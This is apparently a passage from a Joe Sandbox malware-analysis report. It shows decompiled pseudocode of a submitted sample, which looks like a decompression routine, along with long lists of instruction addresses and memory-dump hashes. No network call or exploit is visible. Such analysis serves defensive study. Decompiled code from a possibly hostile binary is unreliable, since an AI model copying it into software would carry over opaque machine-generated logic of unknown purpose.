						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
						if(__eflags > 0) {
							goto L100;
						}
						L15:
						if(__eflags < 0) {
							L17:
							__eflags =  *((char*)(_t638 + 0x4c50));
							if( *((char*)(_t638 + 0x4c50)) != 0) {
								L162:
								 *((char*)(_t638 + 0x4c60)) = 0;
								goto L100;
							}
							goto L18;
						}
						L16:
						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
							goto L100;
						}
						goto L17;
					}
				}
			}









































































































































                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15ebb
                                                        0x00a15ebb
                                                        0x00a15ec1
                                                        0x00a15ecc
                                                        0x00000000
                                                        0x00a15ece
                                                        0x00a15ece
                                                        0x00a15ece
                                                        0x00a15ed4
                                                        0x00a15ed4
                                                        0x00a15edd
                                                        0x00a15ee0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a15eef
                                                        0x00a15ef6
                                                        0x00a164a1
                                                        0x00a164a3
                                                        0x00a164a8
                                                        0x00a164af
                                                        0x00a164af
                                                        0x00a15efc
                                                        0x00a15efc
                                                        0x00a15efd
                                                        0x00a15f00
                                                        0x00a15f07
                                                        0x00000000
                                                        0x00000000
                                                        0x00a15f0d
                                                        0x00a15f15
                                                        0x00a15f16
                                                        0x00a15f17
                                                        0x00a15f18
                                                        0x00a15f1f
                                                        0x00000000
                                                        0x00a15f21
                                                        0x00000000
                                                        0x00a15f21
                                                        0x00a15f1f
                                                        0x00a15f26
                                                        0x00a15f28
                                                        0x00a15f2d
                                                        0x00a15f2f
                                                        0x00000000
                                                        0x00a15f35
                                                        0x00a15f35
                                                        0x00a15f35
                                                        0x00a15f38
                                                        0x00a15f38
                                                        0x00a15f48
                                                        0x00a15f4d
                                                        0x00a15f8d
                                                        0x00a15f8f
                                                        0x00a15f96
                                                        0x00a15f9c
                                                        0x00a15fa2
                                                        0x00a15fa9
                                                        0x00a15fd5
                                                        0x00a15fd7
                                                        0x00a15fd8
                                                        0x00a15fd9
                                                        0x00a15fdb
                                                        0x00a15ff4
                                                        0x00a15ff7
                                                        0x00a15ffe
                                                        0x00a16001
                                                        0x00a16004
                                                        0x00a16010
                                                        0x00a1601c
                                                        0x00a1601e
                                                        0x00a16024
                                                        0x00a16026
                                                        0x00a16026
                                                        0x00a16028
                                                        0x00000000
                                                        0x00a15fdd
                                                        0x00a15fe0
                                                        0x00a15fe3
                                                        0x00a15fe3
                                                        0x00a15fe3
                                                        0x00a15fe5
                                                        0x00a15ff2
                                                        0x00a15ff2
                                                        0x00a15ff2
                                                        0x00a15fe7
                                                        0x00a15fe7
                                                        0x00a15fe8
                                                        0x00a15feb
                                                        0x00a15fee
                                                        0x00000000
                                                        0x00a15ff0
                                                        0x00000000
                                                        0x00a15ff0
                                                        0x00a15fee
                                                        0x00000000
                                                        0x00a15fe3
                                                        0x00a15fab
                                                        0x00a15fad
                                                        0x00a15fb0
                                                        0x00a15fba
                                                        0x00a15fc2
                                                        0x00a15fc8
                                                        0x00a15fcb
                                                        0x00a16030
                                                        0x00a16030
                                                        0x00a16036
                                                        0x00a16072
                                                        0x00a16072
                                                        0x00a16078
                                                        0x00a16474
                                                        0x00a16474
                                                        0x00a1647a
                                                        0x00a164b2
                                                        0x00a164b2
                                                        0x00a164b8
                                                        0x00a16655
                                                        0x00a16655
                                                        0x00a16655
                                                        0x00a1665e
                                                        0x00a16661
                                                        0x00a16663
                                                        0x00a16667
                                                        0x00a16676
                                                        0x00a16678
                                                        0x00a1667b
                                                        0x00a16682
                                                        0x00a16688
                                                        0x00a1668e
                                                        0x00a16695
                                                        0x00a166c1
                                                        0x00a166c3
                                                        0x00a166c4
                                                        0x00a166c5
                                                        0x00a166c7
                                                        0x00a166e3
                                                        0x00a166e6
                                                        0x00a166ed
                                                        0x00a166f0
                                                        0x00a166f3
                                                        0x00a166ff
                                                        0x00a1670b
                                                        0x00a1670d
                                                        0x00a16713
                                                        0x00a16715
                                                        0x00a16715
                                                        0x00a16717
                                                        0x00a1671f
                                                        0x00a1671f
                                                        0x00a16722
                                                        0x00a16725
                                                        0x00a16736
                                                        0x00a16739
                                                        0x00a16739
                                                        0x00a16727
                                                        0x00a16727
                                                        0x00a16727
                                                        0x00a1673b
                                                        0x00a1673e
                                                        0x00a16740
                                                        0x00a16744
                                                        0x00a1674b
                                                        0x00a16753
                                                        0x00a16755
                                                        0x00a1675c
                                                        0x00a1675f
                                                        0x00a1675f
                                                        0x00a16762
                                                        0x00a16762
                                                        0x00a16765
                                                        0x00a1676c
                                                        0x00a16770
                                                        0x00a16773
                                                        0x00a16785
                                                        0x00a16785
                                                        0x00a16790
                                                        0x00a16792
                                                        0x00a16797
                                                        0x00a16799
                                                        0x00a1683e
                                                        0x00a1683e
                                                        0x00a16840
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00000000
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a16846
                                                        0x00a16846
                                                        0x00a1684c
                                                        0x00a1684c
                                                        0x00a16852
                                                        0x00a16857
                                                        0x00a1685b
                                                        0x00a1685e
                                                        0x00a16863
                                                        0x00a1686c
                                                        0x00a1686e
                                                        0x00a1686e
                                                        0x00a1686e
                                                        0x00000000
                                                        0x00a1684c
                                                        0x00a1679f
                                                        0x00a1679f
                                                        0x00a167a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a167a7
                                                        0x00a167a7
                                                        0x00a167ad
                                                        0x00a167af
                                                        0x00a167b5
                                                        0x00a167b8
                                                        0x00a167ba
                                                        0x00a1680b
                                                        0x00a1680b
                                                        0x00a1680e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16814
                                                        0x00a16816
                                                        0x00a16816
                                                        0x00a16819
                                                        0x00a1681d
                                                        0x00a1681f
                                                        0x00a1681f
                                                        0x00a16823
                                                        0x00a16828
                                                        0x00a1682b
                                                        0x00a1682e
                                                        0x00a16831
                                                        0x00a16834
                                                        0x00a16834
                                                        0x00a16834
                                                        0x00000000
                                                        0x00a16839
                                                        0x00a167bc
                                                        0x00a167be
                                                        0x00a167bf
                                                        0x00a167c1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a167c7
                                                        0x00a167c9
                                                        0x00a167c9
                                                        0x00a167cc
                                                        0x00a167cc
                                                        0x00a167ce
                                                        0x00a167d0
                                                        0x00a167d6
                                                        0x00a167dc
                                                        0x00a167e2
                                                        0x00a167e8
                                                        0x00a167ee
                                                        0x00a167f4
                                                        0x00a167f7
                                                        0x00a167fa
                                                        0x00a167fc
                                                        0x00a167ff
                                                        0x00a16801
                                                        0x00a16801
                                                        0x00a16801
                                                        0x00000000
                                                        0x00a16775
                                                        0x00a16775
                                                        0x00a16775
                                                        0x00a1677e
                                                        0x00a1677f
                                                        0x00a162d3
                                                        0x00a162d3
                                                        0x00a162da
                                                        0x00a162df
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15ebb
                                                        0x00a15ebb
                                                        0x00a15ebb
                                                        0x00a15ec1
                                                        0x00a15ecc
                                                        0x00000000
                                                        0x00a15ece
                                                        0x00a15ece
                                                        0x00a15ece
                                                        0x00000000
                                                        0x00a15ecc
                                                        0x00000000
                                                        0x00a15ebb
                                                        0x00a164cc
                                                        0x00a164d3
                                                        0x00a164e7
                                                        0x00a164e7
                                                        0x00a164f2
                                                        0x00a164f5
                                                        0x00a164fa
                                                        0x00a164fc
                                                        0x00a164fe
                                                        0x00a1661b
                                                        0x00a1661b
                                                        0x00a1661d
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15ebb
                                                        0x00a15ec1
                                                        0x00a15ecc
                                                        0x00000000
                                                        0x00a15ece
                                                        0x00a15ece
                                                        0x00a15ece
                                                        0x00a15ecc
                                                        0x00a15eb8
                                                        0x00a16623
                                                        0x00a16623
                                                        0x00a16629
                                                        0x00a16629
                                                        0x00a1662f
                                                        0x00a16634
                                                        0x00a16638
                                                        0x00a1663b
                                                        0x00a16640
                                                        0x00a16649
                                                        0x00a1664b
                                                        0x00a1664b
                                                        0x00a1664b
                                                        0x00a16873
                                                        0x00a16873
                                                        0x00000000
                                                        0x00a16873
                                                        0x00a16504
                                                        0x00a16504
                                                        0x00a16506
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1650c
                                                        0x00a1650c
                                                        0x00a16512
                                                        0x00a16514
                                                        0x00a1651a
                                                        0x00a1651d
                                                        0x00a1651f
                                                        0x00a16569
                                                        0x00a16569
                                                        0x00a1656c
                                                        0x00a16597
                                                        0x00a16597
                                                        0x00a1659a
                                                        0x00a1659c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a165a2
                                                        0x00a165a4
                                                        0x00a165a7
                                                        0x00a165aa
                                                        0x00a165ad
                                                        0x00000000
                                                        0x00000000
                                                        0x00a165b3
                                                        0x00a165b6
                                                        0x00a165b9
                                                        0x00a165bc
                                                        0x00a165bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00a165c5
                                                        0x00a165c8
                                                        0x00a165cb
                                                        0x00a165ce
                                                        0x00a165d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a165d7
                                                        0x00a165da
                                                        0x00a165dd
                                                        0x00a165e0
                                                        0x00a165e3
                                                        0x00000000
                                                        0x00000000
                                                        0x00a165e9
                                                        0x00a165ec
                                                        0x00a165ef
                                                        0x00a165f2
                                                        0x00a165f5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a165fb
                                                        0x00a165fe
                                                        0x00a16601
                                                        0x00a16604
                                                        0x00a16607
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1660d
                                                        0x00a16610
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00000000
                                                        0x00a15eb8
                                                        0x00a15eb8
                                                        0x00a1656e
                                                        0x00a16570
                                                        0x00a16570
                                                        0x00a16573
                                                        0x00a16577
                                                        0x00a16579
                                                        0x00a16579
                                                        0x00a1657d
                                                        0x00a16582
                                                        0x00a16585
                                                        0x00a16588
                                                        0x00a1658b
                                                        0x00a1658e
                                                        0x00a1658e
                                                        0x00a1658e
                                                        0x00a16593
                                                        0x00a16593
                                                        0x00000000
                                                        0x00a16593
                                                        0x00a16521
                                                        0x00a16523
                                                        0x00a16524
                                                        0x00a16526
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16528
                                                        0x00a1652a
                                                        0x00a1652a
                                                        0x00a1652d
                                                        0x00a1652d
                                                        0x00a1652f
                                                        0x00a16531
                                                        0x00a16537
                                                        0x00a1653d
                                                        0x00a16543
                                                        0x00a16549
                                                        0x00a1654f
                                                        0x00a16555
                                                        0x00a16558
                                                        0x00a1655b
                                                        0x00a1655d
                                                        0x00a16560
                                                        0x00a16562
                                                        0x00a16562
                                                        0x00a16562
                                                        0x00000000
                                                        0x00a16567
                                                        0x00a164d5
                                                        0x00a164d5
                                                        0x00a164de
                                                        0x00a164df
                                                        0x00000000
                                                        0x00a164df
                                                        0x00a1648d
                                                        0x00a16494
                                                        0x00a16499
                                                        0x00a16499
                                                        0x00000000
                                                        0x00a15eb8
                                                        0x00a16773
                                                        0x00a166c9
                                                        0x00a166cf
                                                        0x00a166d2
                                                        0x00a166d2
                                                        0x00a166d2
                                                        0x00a166d4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a166d6
                                                        0x00a166d6
                                                        0x00a166d7
                                                        0x00a166da
                                                        0x00a166dd
                                                        0x00000000
                                                        0x00000000
                                                        0x00a166df
                                                        0x00000000
                                                        0x00a166df
                                                        0x00a166e1
                                                        0x00a166e1
                                                        0x00000000
                                                        0x00a166e1
                                                        0x00a16697
                                                        0x00a16699
                                                        0x00a1669c
                                                        0x00a166a6
                                                        0x00a166ae
                                                        0x00a166b4
                                                        0x00a166b7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16669
                                                        0x00a16669
                                                        0x00a1666c
                                                        0x00a1666e
                                                        0x00a16671
                                                        0x00a16671
                                                        0x00a16671
                                                        0x00000000
                                                        0x00a16669
                                                        0x00a164be
                                                        0x00a164be
                                                        0x00a164c1
                                                        0x00a164c4
                                                        0x00a164c4
                                                        0x00a1647c
                                                        0x00a16482
                                                        0x00a16484
                                                        0x00a16489
                                                        0x00a1648b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1648b
                                                        0x00a1607e
                                                        0x00a1607e
                                                        0x00a16084
                                                        0x00a16087
                                                        0x00a16098
                                                        0x00a1609b
                                                        0x00a1609b
                                                        0x00a16089
                                                        0x00a16089
                                                        0x00a16089
                                                        0x00a1609d
                                                        0x00a160a0
                                                        0x00a160a2
                                                        0x00a160a6
                                                        0x00a160ad
                                                        0x00a160b5
                                                        0x00a160b7
                                                        0x00a160be
                                                        0x00a160c1
                                                        0x00a160c1
                                                        0x00a160c4
                                                        0x00a160c4
                                                        0x00a160c9
                                                        0x00a160d0
                                                        0x00a160d6
                                                        0x00a160dc
                                                        0x00a160e3
                                                        0x00a1610f
                                                        0x00a16111
                                                        0x00a16112
                                                        0x00a16113
                                                        0x00a16115
                                                        0x00a16131
                                                        0x00a16134
                                                        0x00a1613b
                                                        0x00a1613e
                                                        0x00a16141
                                                        0x00a1614d
                                                        0x00a16159
                                                        0x00a1615b
                                                        0x00a16161
                                                        0x00a16163
                                                        0x00a16163
                                                        0x00a16165
                                                        0x00000000
                                                        0x00a16165
                                                        0x00a16117
                                                        0x00a1611d
                                                        0x00a16120
                                                        0x00a16120
                                                        0x00a16120
                                                        0x00a16122
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16124
                                                        0x00a16124
                                                        0x00a16125
                                                        0x00a16128
                                                        0x00a1612b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1612d
                                                        0x00000000
                                                        0x00a1612d
                                                        0x00a1612f
                                                        0x00a1612f
                                                        0x00000000
                                                        0x00a160e5
                                                        0x00a160e5
                                                        0x00a160e7
                                                        0x00a160ea
                                                        0x00a160f4
                                                        0x00a160fc
                                                        0x00a16102
                                                        0x00a16105
                                                        0x00a1616d
                                                        0x00a1616d
                                                        0x00a16170
                                                        0x00a16173
                                                        0x00a16183
                                                        0x00a16186
                                                        0x00a16186
                                                        0x00a16175
                                                        0x00a16175
                                                        0x00a16175
                                                        0x00a16188
                                                        0x00a16189
                                                        0x00a1618d
                                                        0x00a1618f
                                                        0x00a16193
                                                        0x00a16195
                                                        0x00a16289
                                                        0x00a16289
                                                        0x00000000
                                                        0x00a1619b
                                                        0x00a1619b
                                                        0x00a1619b
                                                        0x00a1619e
                                                        0x00a162e4
                                                        0x00a162e7
                                                        0x00a162f0
                                                        0x00a162f8
                                                        0x00a162fc
                                                        0x00a16300
                                                        0x00a16307
                                                        0x00a1630a
                                                        0x00a16310
                                                        0x00a1628c
                                                        0x00a1628c
                                                        0x00a16292
                                                        0x00a16294
                                                        0x00a16295
                                                        0x00a1629b
                                                        0x00a1629d
                                                        0x00a1629e
                                                        0x00a162a4
                                                        0x00a162a6
                                                        0x00a162a6
                                                        0x00a162a6
                                                        0x00a162a4
                                                        0x00a1629b
                                                        0x00a162aa
                                                        0x00a162b0
                                                        0x00a162b6
                                                        0x00a162b9
                                                        0x00a162bc
                                                        0x00a162c3
                                                        0x00a162c6
                                                        0x00a16318
                                                        0x00a1631e
                                                        0x00a16321
                                                        0x00a16323
                                                        0x00a1632a
                                                        0x00a1632c
                                                        0x00a1632e
                                                        0x00a1643a
                                                        0x00a1643a
                                                        0x00a1643c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16442
                                                        0x00a16442
                                                        0x00a16448
                                                        0x00a16448
                                                        0x00a1644e
                                                        0x00a16453
                                                        0x00a16457
                                                        0x00a1645a
                                                        0x00a1645f
                                                        0x00a16468
                                                        0x00a1646a
                                                        0x00a1646a
                                                        0x00a1646a
                                                        0x00000000
                                                        0x00a1646f
                                                        0x00a16334
                                                        0x00a16334
                                                        0x00a16336
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1633c
                                                        0x00a1633c
                                                        0x00a16342
                                                        0x00a16345
                                                        0x00a1634b
                                                        0x00a1634d
                                                        0x00a16351
                                                        0x00a1639c
                                                        0x00a1639c
                                                        0x00a1639f
                                                        0x00a163ce
                                                        0x00a163ce
                                                        0x00a163d0
                                                        0x00a163d8
                                                        0x00a163db
                                                        0x00a163de
                                                        0x00a163e7
                                                        0x00a163ea
                                                        0x00a163ed
                                                        0x00a163f6
                                                        0x00a163f9
                                                        0x00a163fc
                                                        0x00a16405
                                                        0x00a16408
                                                        0x00a1640b
                                                        0x00a16414
                                                        0x00a16417
                                                        0x00a1641a
                                                        0x00a16423
                                                        0x00a16426
                                                        0x00a16429
                                                        0x00a16432
                                                        0x00a16432
                                                        0x00a16429
                                                        0x00a1641a
                                                        0x00a1640b
                                                        0x00a163fc
                                                        0x00a163ed
                                                        0x00a163de
                                                        0x00000000
                                                        0x00a163d0
                                                        0x00a163a1
                                                        0x00a163a3
                                                        0x00a163a3
                                                        0x00a163a6
                                                        0x00a163aa
                                                        0x00a163ac
                                                        0x00a163ac
                                                        0x00a163b0
                                                        0x00a163b5
                                                        0x00a163b8
                                                        0x00a163bb
                                                        0x00a163be
                                                        0x00a163c1
                                                        0x00a163c1
                                                        0x00a163c1
                                                        0x00a163c6
                                                        0x00a163ca
                                                        0x00000000
                                                        0x00a163ca
                                                        0x00a16353
                                                        0x00a16353
                                                        0x00a16356
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16358
                                                        0x00a1635a
                                                        0x00a1635a
                                                        0x00a1635d
                                                        0x00a1635d
                                                        0x00a1635f
                                                        0x00a16362
                                                        0x00a16368
                                                        0x00a1636e
                                                        0x00a16374
                                                        0x00a1637a
                                                        0x00a16380
                                                        0x00a16386
                                                        0x00a16389
                                                        0x00a1638c
                                                        0x00a1638f
                                                        0x00a16392
                                                        0x00a16395
                                                        0x00a16395
                                                        0x00a16395
                                                        0x00000000
                                                        0x00a162c8
                                                        0x00a162c8
                                                        0x00a162c8
                                                        0x00a162d1
                                                        0x00a162d2
                                                        0x00000000
                                                        0x00a162d2
                                                        0x00a162c6
                                                        0x00a161a4
                                                        0x00a161a4
                                                        0x00a161d7
                                                        0x00a161a6
                                                        0x00a161a9
                                                        0x00a161b2
                                                        0x00a161ba
                                                        0x00a161bd
                                                        0x00a161c5
                                                        0x00a161cc
                                                        0x00a161d2
                                                        0x00a161d2
                                                        0x00a161dc
                                                        0x00a161e3
                                                        0x00a161e9
                                                        0x00a161ef
                                                        0x00a161f6
                                                        0x00a16222
                                                        0x00a16224
                                                        0x00a16225
                                                        0x00a16226
                                                        0x00a16228
                                                        0x00a16244
                                                        0x00a16247
                                                        0x00a1624e
                                                        0x00a16251
                                                        0x00a16254
                                                        0x00a16260
                                                        0x00a1626c
                                                        0x00a1626e
                                                        0x00a16274
                                                        0x00a16276
                                                        0x00a16276
                                                        0x00a16278
                                                        0x00000000
                                                        0x00a16278
                                                        0x00a1622a
                                                        0x00a16230
                                                        0x00a16233
                                                        0x00a16233
                                                        0x00a16233
                                                        0x00a16235
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16237
                                                        0x00a16237
                                                        0x00a16238
                                                        0x00a1623b
                                                        0x00a1623e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16240
                                                        0x00000000
                                                        0x00a16240
                                                        0x00a16242
                                                        0x00a16242
                                                        0x00000000
                                                        0x00a161f8
                                                        0x00a161f8
                                                        0x00a161fa
                                                        0x00a161fd
                                                        0x00a16207
                                                        0x00a1620f
                                                        0x00a16215
                                                        0x00a16218
                                                        0x00a16280
                                                        0x00a16283
                                                        0x00a16283
                                                        0x00a16285
                                                        0x00000000
                                                        0x00a16285
                                                        0x00a161f6
                                                        0x00a16195
                                                        0x00a160e3
                                                        0x00a16038
                                                        0x00a16038
                                                        0x00a1603f
                                                        0x00a1605d
                                                        0x00a16063
                                                        0x00a16068
                                                        0x00a1606b
                                                        0x00000000
                                                        0x00a1606b
                                                        0x00a16041
                                                        0x00a1604e
                                                        0x00a16056
                                                        0x00000000
                                                        0x00a16056
                                                        0x00a15fa9
                                                        0x00a15f4f
                                                        0x00a15f4f
                                                        0x00a15f51
                                                        0x00000000
                                                        0x00000000
                                                        0x00a15f53
                                                        0x00a15f55
                                                        0x00a15f5a
                                                        0x00a15f60
                                                        0x00a15f66
                                                        0x00000000
                                                        0x00000000
                                                        0x00a15f6c
                                                        0x00a15f6c
                                                        0x00a15f80
                                                        0x00a15f80
                                                        0x00a15f87
                                                        0x00a1687b
                                                        0x00a1687b
                                                        0x00000000
                                                        0x00a1687b
                                                        0x00000000
                                                        0x00a15f87
                                                        0x00a15f6e
                                                        0x00a15f6e
                                                        0x00a15f74
                                                        0x00a15f7a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a15f7a
                                                        0x00a15ebb

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47fe8b68d85eb5d17935bfec2f030431fd039ced6a7f16b8f26ca7e07dbe69ab
                                                        • Instruction ID: 5cf644a297aed661bce064a24a19d0df35d494ae5672e83a8b04cb0f850692af
                                                        • Opcode Fuzzy Hash: 47fe8b68d85eb5d17935bfec2f030431fd039ced6a7f16b8f26ca7e07dbe69ab
                                                        • Instruction Fuzzy Hash: AE62E771A047859FCB29CF38C9906F9BBE1AF95304F08896DD8EB8B346D634E985C714
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A172FF Relevance: .8, Instructions: 773COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00A172FF(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E00A0A9F3(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
